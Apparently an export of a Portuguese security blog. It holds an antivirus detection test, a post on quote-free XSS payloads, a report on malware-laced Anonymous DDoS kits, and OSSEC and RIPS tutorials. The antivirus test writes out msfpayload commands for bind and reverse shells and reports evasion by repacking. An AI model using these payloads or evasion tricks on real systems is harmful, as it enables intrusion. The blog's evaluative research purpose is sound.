</td><td class="s5" dir="ltr">ASP</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">ASPX</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"><br /></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">JSP</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Perl</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">PHP</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">CFM</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s8"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s10"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s12" dir="ltr">Executaveis MetaSploit</td><td class="s13" dir="ltr">Encoding</td><td class="s13" dir="ltr">Extensao alterada</td><td class="s13" dir="ltr">Detecção na gravação?</td><td class="s13" dir="ltr">Detecção na execução?</td><td class="s13" dir="ltr">Detecção Manual Scan?</td><td class="s13" dir="ltr">Comando:</td><td class="s14"></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Sample1 Bind na porta 6666</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">msfpayload windows/shell_bind_tcp LPORT=6666 X > /tmp/msf_sample1.exe</td><td class="s14"></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Sample 2 Reverse Shell porta 6666</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">msfpayload windows/shell_reverse_tcp LHOST=172.16.0.1 LPORT=6666 X > /tmp/msf_sample2.exe</td><td class="s14"></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Sample 3 Arbitrary Command Exec</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">msfpayload windows/exec CMD=calc.exe X > /tmp/msf_sample3.exe</td><td class="s14"></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s8"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s10"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s12" dir="ltr">Ferramentas para DoS</td><td class="s13" dir="ltr">Encoding</td><td class="s13" dir="ltr">Extensao alterada</td><td class="s13" dir="ltr">Detecção na gravação?</td><td class="s13" dir="ltr">Detecção na execução?</td><td class="s13" dir="ltr">Detecção Manual Scan?</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">SlowLoris</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Loic</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s8"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s15"></td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s16"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s17"></td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s18" dir="ltr">IRC Bots (Perl)</td><td class="s13" dir="ltr">Encoding</td><td class="s13" dir="ltr">Extensao alterada</td><td class="s13" dir="ltr">Detecção na gravação?</td><td class="s13" dir="ltr">Detecção na execução?</td><td class="s13" dir="ltr">Detecção Manual Scan?</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">AlphaNix 2.0</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Scane</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Sexi</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s5" dir="ltr">Shellbot</td><td class="s6" dir="ltr">Texto Plano</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s8"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s15"></td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s10"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s11"></td><td class="s17"></td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s12" dir="ltr">Samples EICAR.org</td><td class="s13" dir="ltr">Packing</td><td class="s13" dir="ltr">Extensao alterada</td><td class="s13" dir="ltr">Detecção na gravação?</td><td class="s13" dir="ltr">Detecção na execução?</td><td class="s13" dir="ltr">Detecção Manual Scan?</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s19" dir="ltr"><a href="http://www.google.com/url?q=http://eicar.com&usd=2&usg=ALhdy29CErZDYj-ksBvOYq8injk-s4_s8g" style="color: black;" target="_blank">eicar.com</a></td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Sim</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s19" dir="ltr">eicar.com.txt</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Sim</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">N \ A</td><td class="s6" dir="ltr">Sim</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s19" dir="ltr">eicar_com.zip</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Compactado</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">N \ A</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s19" dir="ltr">eicarcom2.zip</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">Compactado</td><td class="s6" dir="ltr">Não</td><td class="s6" dir="ltr">N \ A</td><td class="s6" dir="ltr">Não</td><td class="s7"></td><td></td></tr>
<tr dir="ltr"><td class="hd"><div style="height: 16px;">
</div>
</td><td class="s8"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td class="s9"></td><td></td><td></td></tr>
</tbody></table>
<br />
<div>
<span style="font-family: inherit;">Os teste foram realizados entre os dias 06 e 07 de agosto, 2012.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">No dia 06 o sample1 do MetaSploit não tinha sido encontrado, já no dia, 07 ele foi encontrado(Trojan.Generic) e removido, porém, somente com manual scan. Os binários gerados no Metasploit ao serem executados abriram portas, realizaram conexões com a internet e executaram comandos e mesmo assim não geraram alertar algum do Psafe. Outro problema grande foi que após a detecção do msf_sample1.exe, geramos novamente, porém, alterando a porta para 6667 e não foi detectado.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Testamos vários malwares voltados a roubo de senhas bancárias e afins, o índice de detecção foi baixo. Dos 35 samples analisados, apenas 7 foram detectados.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Dos detectados, utilizamos o que possui assinatura: HEUR/Malware.QVM20.Gen para mais alguns testes:</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">- Não foi detectado na gravação.</span><br />
<span style="font-family: inherit;">- Foi detectado mesmo trocando a extensão.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Ao utilizarmos um compactador de binários simples (Aspack) o malware parou de ser dectado no Scan manual e foi removido apenas o .bak gerado pelo Aspack.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Outro ponto importante, não há verificação de endereços Web maliciosos, durante a pesquisa visitamos vários sites conhecidos por distribuição de malwares e nenhum alerta foi gerado.<br /><br />Conclusão:</span><br />
<span style="line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;">O AV se mostrou ineficaz em seu propósito, apresentando um baixo índice de detecção de malwares, especialmente os mais populares no Brasil que permitem o acesso a contas bancárias e podem gerar prejuízos diversos para a maioria dos usuários da Internet no País. </span></span><br />
<span style="line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></span>
<span style="line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;">O fato é agravado pela empresa posicionar o seu produto como “o único antivírus completo e totalmente gratuito que existe, podendo levar o usuário doméstico a entender que existe um nível de perfeição quando comparado aos concorrentes, algo que não corresponde a realidade obtida nos testes realizados.
</span></span><br />
<br />
---------------------------------------------------------------------------------------------------------<br />
<br />
Esta pesquisa foi feita em conjunto com Gabriel Lanzi (Psylon) @gmlnet<br />
Gostaria de agradecer ao Fio (@fiocavallari @BrauvonHacker ) pela ajuda com os Samples e ao amigo
Lincoln Werneck (<span style="background-color: white; line-height: 14px; white-space: pre-wrap;"><span style="font-family: inherit;">@lincolnwerneck)</span></span><span style="font-family: inherit;"> <span style="background-color: white;"> </span><span style="background-color: white;">do Instituto Coaliza (@Coaliza)</span></span><span style="background-color: white; color: #222222; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px;"> </span>na redação deste post.<br />
<br /></div>Unknownnoreply@blogger.com52tag:blogger.com,1999:blog-2185986060583872831.post-61138760122490870172012-08-05T06:26:00.001-07:002012-08-05T07:07:05.478-07:00Xss sem aspas<br />
<span style="font-family: arial;">Bom dia senhores,</span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Segue aqui um Xss interessante que achei no forum: http://www.garage4hackers.com/f11/unusual-xss-payload-2522.html </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Vou fazer uma pequena análise no payload utilizado.<br /><br /> Abaixo o código: </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;"><b>alert(String(/DcLabs/).substr(1,6) ); </b></span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Note que é a usado o String para definir a string que vamos utilizar. O texto precisa necessariamente estar entre / / justamente para evitar as aspas, logo após é utilizada a função Substr, aqui ela irá extrair a string Dclabs removendo as // . </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Funcionaria sem esta função, mas as barras seriam exibidas no alert ou onde você injetasse o código, e isso poderia causar problemas.</span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Caso queira utilizar uma string maior, será necessário alterar o deslocamento no substr. Sempre uma posição a mais no inicio e uma a menos no final da string utilizada, evitando assim as //. </span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Já este, utiliza o objeto sessionStorage(que serve pra guardar informações da navegação entre janelas ou tabs.) e controles de erro para exibir o alert.</span><br />
<span style="font-family: arial;"><b>(sessionStorage[!-1]=alert(123))(!-1)</b></span><br />
<span style="font-family: arial;"><br />Neste caso, com a ideia é não usar aspas:</span><br />
<span style="font-family: arial;"><br /><b>(sessionStorage[!-1]=alert( String(/DcLabs/).substr(1,6) ) )(!-1)</b></span><br />
<span style="font-family: arial;"><br /></span><br />
<span style="font-family: arial;">Ok! Temos um Xss sem aspas! (: </span>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-40605909860027235582012-03-05T09:54:00.002-08:002012-03-05T09:54:54.017-08:00[DcLabs] Slowloris e outras ferramentas do Anonymous infectadas por malwaresSlowloris e outras ferramentas do Anonymous infectadas por malwares
A pesquisa disponibilizada pela <a href="http://www.symantec.com/connect/fr/blogs/anonymous-supporters-tricked-installing-zeus-trojan">Symantec</a> mostra que uma das ferramentas utilizadas pelo Anonymous foi modificada com o malware <a href="http://blog.alexos.com.br/?p=1359">Zeus</a>. As figuras abaixo comparam as características do arquivos disponibilizados em maio de 2011 e janeiro de 2012 durante a operação Megaupload com cerca de 26000 views e 400 tweets.<br />
<br />
<img alt="img" src="http://www.symantec.com/connect/imagebrowser/view/image/2149291/_original" />
No Brasil novos membros contam com vários pacotes para iniciantes contendo todas as ferramentas necessárias para os ataques de DDoS e instruções de uso.<br />
<br />
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/03/tools.png"><img alt="" class="alignnone size-medium wp-image-2992" height="173" src="http://blog.alexos.com.br/wp-content/uploads/2012/03/tools-300x173.png" title="tools" width="300" /></a><br />
Analisando o conteúdo do pacote identifiquei que 28 dos 42 arquivos são malwares.<br />
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal11.png"><img alt="" class="alignnone size-medium wp-image-2997" height="247" src="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal11-300x247.png" title="virustotal1" width="300" /></a><br />
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal2.png"><img alt="" class="alignnone size-medium wp-image-2995" height="250" src="http://blog.alexos.com.br/wp-content/uploads/2012/03/virustotal2-300x250.png" title="virustotal2" width="300" /></a><br />
Como uma grande parte dos integrantes são newbies(novatos) suas máquinas acabam não só servindo como zumbis "voluntários" para os propósitos hacktivistas,mas elas podem estar sendo utilizadas também para ações do cybercrime.
Leia mais:
<a href="http://www.symantec.com/connect/fr/blogs/anonymous-supporters-tricked-installing-zeus-trojan">Anonymous Supporters Tricked into Installing Zeus Trojan</a>
<a href="http://www.imperva.com/download.asp?id=312">The Anatomy of an Anonymous Attack</a><br />
<br />
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">--</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">Alexandro Silva (Alexos)</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 19px; text-align: justify;">DcLabs Security Team</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-21230620380627840012012-03-02T04:22:00.000-08:002012-03-02T04:23:00.024-08:00Configurando chaves de autenticação dos agentes no OssecO <a href="http://blog.alexos.com.br/?p=886">modo tradicional</a> para configurar as chaves de autenticação dos <a href="http://blog.alexos.com.br/?p=886">agentes</a> no Ossec server é sustentável até 5 servidores em média. Para facilitar esta tarefa <a href="http://dcid.me/">Daniel Cid</a> criou o daemon <a href="http://www.ossec.net/doc/programs/ossec-authd.html">ossec-authd</a>, responsável por gerenciar as chaves de autenticação dos agentes no servidor usando um certificado digital.
<strong>NO OSSEC SERVER</strong>
Execute os seguintes comandos para gerar o certificado:
<br />
<blockquote>
#openssl genrsa -out /var/ossec/etc/sslmanager.key 2048
Generating RSA private key, 2048 bit long modulus
.........................................................................+++
...................................................................................................................................+++
e is 65537 (0x10001)
</blockquote>
<blockquote>
#openssl req -new -x509 -key /var/ossec/etc/sslmanager.key -out /var/ossec/etc/sslmanager.cert -days 365
-----
Country Name (2 letter code) [AU]:<strong>BR</strong>
State or Province Name (full name) [Some-State]:<strong>Bahia</strong>
Locality Name (eg, city) []:<strong>Salvador</strong>
Organization Name (eg, company) [Internet Widgits Pty Ltd]:<strong>Alexos Core Labs</strong>
Organizational Unit Name (eg, section) []:<strong>IT</strong>
Common Name (eg, YOUR name) []:<strong>debian</strong>
Email Address []:<strong>alexos@acme.com</strong>
</blockquote>
Inicie o ossec-authd
<br />
<blockquote>
#/var/ossec/bin/ossec-authd -p 1515 >/dev/null 2>&1 &
</blockquote>
<blockquote>
#netstat -at | grep 1515
tcp 0 0 *:1515 *:* LISTEN
</blockquote>
<strong>NO OSSEC AGENT</strong>
OBS: Antes de compilar o agente instale o pacote <strong><em>libssl-dev</em></strong> ( Debian ) ou <strong><em>openssl-dev</em></strong> ( CentOS ) evitando assim a mensagem erro abaixo.
<br />
<blockquote>
<strong>ERROR: Not compiled. Missing OpenSSL support.</strong>
</blockquote>
Execute o seguinte comando para iniciar a autenticação:
<br />
<blockquote>
#/var/ossec/bin/agent-auth -m 192.168.0.1 -p 1515
2012/03/01 20:28:12 ossec-authd: INFO: Started (pid: 10988).
INFO: Connected to 192.168.0.1:1515
INFO: Using agent name as: debian
INFO: Send request to manager. Waiting for reply.
INFO: Received response with agent key
INFO: Valid key created. Finished.
INFO: Connection closed.
</blockquote>
Reinicie o servidor e o agente:
<br />
<blockquote>
invoke-rc.d ossec restart ( Debian )
</blockquote>
ou
<br />
<blockquote>
service ossec restart ( CentOS )
</blockquote>
Confirme a comunicação usando o <strong>agent_control</strong> no servidor
<br />
<blockquote>
#/var/ossec/bin/agent_control -l
OSSEC HIDS agent_control. List of available agents:
ID: 000, Name: debian (server), IP: 127.0.0.1, Active/Local
<strong>ID: 1024, Name: debian, IP: any, Active</strong>
</blockquote>
<a href="http://dcid.me/2011/01/automatically-creating-and-setting-up-the-agent-keys/">Referência</a><br />
<br />
--<br />
Alexandro Silva (Alexos)<br />
DcLabs Security TeamUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-19390288389342301102012-02-28T09:41:00.002-08:002012-02-28T09:43:51.322-08:00Configurando o agente do Ossec HIDS no Windows serverA instalação do Ossec no Windows é bastante intuitiva porém alguns ajustes são necessários para garantir sua total eficiência.
Após conclui-la é necessário registrar o host no Ossec Server permitindo assim a comunicação entre ambos.
No <strong>servidor</strong> execute os seguintes passos
<br />
Execute o manage_agents
<br />
<br />
/var/ossec/bin/manage_agents
<br />
****************************************
*<br />
OSSEC HIDS v2.6 Agent manager.<br />
*
*The following options are available:<br />
*
****************************************<br />
(A)dd an agent (A).<br />
(E)xtract key for an agent (E).<br />
(L)ist already added agents (L).<br />
(R)emove an agent (R).<br />
(Q)uit.
Choose your action: A,E,L,R or Q:<strong> [ Digite A para adicionar um agente ]
</strong>
- Adding a new agent (use '\q' to return to the main menu).<br />
Please provide the following:<br />
* A name for the new agent:<strong> </strong>teste<strong> [ Digite o nome do agente ]</strong><br />
* The IP Address of the new agent:<strong> </strong>xxx.xxx.xxx.xxx<strong> [ Digite o IP do agente ]</strong>
<br />
* An ID for the new agent[001]: <strong>[ Pressione ENTER ou informe um ID ]</strong>
Agent information:
ID:001
Name:W2k3
IP Address:192.168.0.2
<br />
Confirm adding it?(y/n): y <strong>[ Digite 'y' ]
</strong>
Agent added.<br />
<br />
****************************************
* <br />
OSSEC HIDS v2.6 Agent manager.<br />
*
* The following options are available:<br />
*
****************************************
<br />
(A)dd an agent (A).<br />
(E)xtract key for an agent (E).<br />
(L)ist already added agents (L).<br />
(R)emove an agent (R).<br />
(Q)uit.
Choose your action: A,E,L,R or Q: E <strong>[ Digite 'E' para obter a chave do agente ]</strong><br />
<strong></strong>Available agents:
ID: 001, Name: teste, IP: 192.168.0.2<br />
Provide the ID of the agent to extract the key (or '\q' to quit): 001 <strong>[ Informe o ID do agente ]</strong><br />
<br />
<strong></strong>Agent key information for ’001′ is: [ Guarde esta chave para adicionar na configuração do agente ]
MDAxIHRlc3RlIDE3Mi4xNi4wLjYgZmRkMDRiM2EyNThlYWM0ZWQ5ODU1NWZmNGY0NjM3YTVjMDI2MzA5NTg1Y2M5NjgyODczNjIxMTdiMzhlZWFlYw==<br />
<br />
Reinicie o Ossec Server
<br />
/var/ossec/bin/ossec-control restart<br />
Adicione no agente o ip do Ossec Server e a chave gerada anteriormente.
<a href="http://blog.alexos.com.br/wp-content/uploads/2012/02/ossecagent.png"><img alt="" class="alignnone size-medium wp-image-2900" height="263" src="http://blog.alexos.com.br/wp-content/uploads/2012/02/ossecagent-300x263.png" title="ossecagent" width="300" /></a><br />
Por padrão o agente do Windows faz a leitura dos logs do 1o virtual host ( W3SVC1 até W3SVC254 para WEB, MSFTPSVC1 até MSFTPSVC254 para FTP e SMTPSVC1 até SMTPSVC254 para SMTP). Está configuração padrão não atente na maioria dos casos, por isso é necessário ajustar tanto o IIS quanto o Ossec.
<strong>NO IIS</strong>
Execute os seguintes passos em todos o VHOSTS existentes tanto para WEB quanto para FTP
1 - Marque as opções 1 e 2 como mostra a tela abaixo:
<br /><br />
<img alt="img1" src="http://www.ossec.net/doc/_images/w3c-opt3.jpg" /><br />
Guarde o caminho do arquivo de log ( LOG FILE NAME ) que na imagem acima é <strong>W3SVC767321757\exyymmdd.log</strong>. Iremos adicionar está informação no arquivo de configuração do agente.
2 - Clique na aba AVANÇADO marcando todas as opções existentes.<br />
<br />
<img alt="img2" src="http://www.ossec.net/doc/_images/w3c-opt2.jpg" /><br />
<br />
<strong>NO AGENTE DO OSSEC</strong>
1 - Inicie o Agent Manager e clique em VIEW -> VIEW CONFIG
Adicione a seguinte XML TAG no final do arquivo informando os diretórios apresentados anteriormente pelo IIS. Repita toda a TAG para cada diretório.
<style type="text/css">
ol{margin:0;padding:0}p{margin:0}.c2{vertical-align:top;width:468pt;border-style:solid;border-color:#000000;border-width:1pt;padding:5pt 5pt 5pt 5pt}.c3{max-width:468pt;background-color:#ffffff;padding:72pt 72pt 72pt 72pt}.c1{height:11pt;direction:ltr}.c0{line-height:1.0;direction:ltr}.c4{border-collapse:collapse}.title{padding-top:24pt;line-height:1.15;text-align:left;color:#000000;font-size:36pt;font-family:Arial;font-weight:bold;padding-bottom:6pt}.subtitle{padding-top:18pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:24pt;font-family:Georgia;padding-bottom:4pt}body{color:#000000;font-size:11pt;font-family:Arial}h1{padding-top:24pt;line-height:1.15;text-align:left;color:#000000;font-size:18pt;font-family:Arial;font-weight:bold;padding-bottom:6pt}h2{padding-top:18pt;line-height:1.15;text-align:left;color:#000000;font-size:14pt;font-family:Arial;font-weight:bold;padding-bottom:4pt}h3{padding-top:14pt;line-height:1.15;text-align:left;color:#666666;font-size:12pt;font-family:Arial;font-weight:bold;padding-bottom:4pt}h4{padding-top:12pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:11pt;font-family:Arial;padding-bottom:2pt}h5{padding-top:11pt;line-height:1.15;text-align:left;color:#666666;font-size:10pt;font-family:Arial;font-weight:bold;padding-bottom:2pt}h6{padding-top:10pt;line-height:1.15;text-align:left;color:#666666;font-style:italic;font-size:10pt;font-family:Arial;padding-bottom:2pt}
</style><br />
<div class="c1">
</div>
<table cellpadding="0" cellspacing="0" class="c4"><tbody>
<tr><td class="c2"><div class="c0">
<!-- IIS log file --></div>
<div class="c0">
<ossec_config></div>
<div class="c0">
<localfile></div>
<div class="c0">
<location>C:\WINDOWS\System32\LogFiles\W3SVC767321757\ex%y%m%d.log</location></div>
<div class="c0">
<log_format>iis</log_format></div>
<div class="c0">
</localfile></div>
<div class="c0">
</ossec_config></div>
</td></tr>
</tbody></table>
<div class="c1">
</div>
Após executar os passos acima reinicie o agente acompanhando seu log e os alertas.<br />
<br />
--
Alexandro Silva (Alexos)Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2185986060583872831.post-44921662674890255302012-01-08T03:39:00.000-08:002012-01-08T07:17:18.070-08:00RIPS 0.51: Basic analysis<br />
Fiz alguns testes na ferramenta, ele se comportou bem, inclusive com sistema de porte maior. <br />
Analisei com aplicações entre 1 e 1200 arquivos, acima de 100 achei
performance um pouco degradada, testei em uma maquina core i5/6GB, o
Rips faz o httpd consumir cerca de 25% de processamento. <br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="text-align: -webkit-auto;">São vários níveis de scaneamento e é possível escolher a varredura Server side e Client, além de ser possível procurar por falhas especificas</span>
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://3.bp.blogspot.com/-ftqcGrCvFV4/TwmDfJfjiQI/AAAAAAAAAT0/Vj5KYONLZF4/s1600/ScreenHunter_06+Jan.+08+09.51.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ftqcGrCvFV4/TwmDfJfjiQI/AAAAAAAAAT0/Vj5KYONLZF4/s1600/ScreenHunter_06+Jan.+08+09.51.jpg" /></a></div>
<br />
<br />
O que achei bem interessante, foi que ele mostra em tempo real qual
arquivo esta sendo scaneado, a quantidade de arquivos scaneados/total, número da linha e
uma estimativa de término. Esta estimativa não funciona muito bem, mas já ajuda.<br />
<br />
<br />
<a href="http://3.bp.blogspot.com/-ZaJyBPbT9tE/Twl6B_j4glI/AAAAAAAAATs/I1ji4O72q2o/s1600/ScreenHunter_01+Jan.+08+09.00.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-ZaJyBPbT9tE/Twl6B_j4glI/AAAAAAAAATs/I1ji4O72q2o/s1600/ScreenHunter_01+Jan.+08+09.00.jpg" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
O modo como a falha é exibida é bem intuitiva, com links e referências para funções, além de sugerir as devidas correções.<br />
<div style="text-align: left;">
<br class="Apple-interchange-newline" /></div>
<br />
<a href="http://3.bp.blogspot.com/-R0zTEimFjj8/Twl6BpUX-hI/AAAAAAAAATk/K8V4Rby1pbc/s1600/ScreenHunter_02+Jan.+08+09.01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="92" src="http://3.bp.blogspot.com/-R0zTEimFjj8/Twl6BpUX-hI/AAAAAAAAATk/K8V4Rby1pbc/s320/ScreenHunter_02+Jan.+08+09.01.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
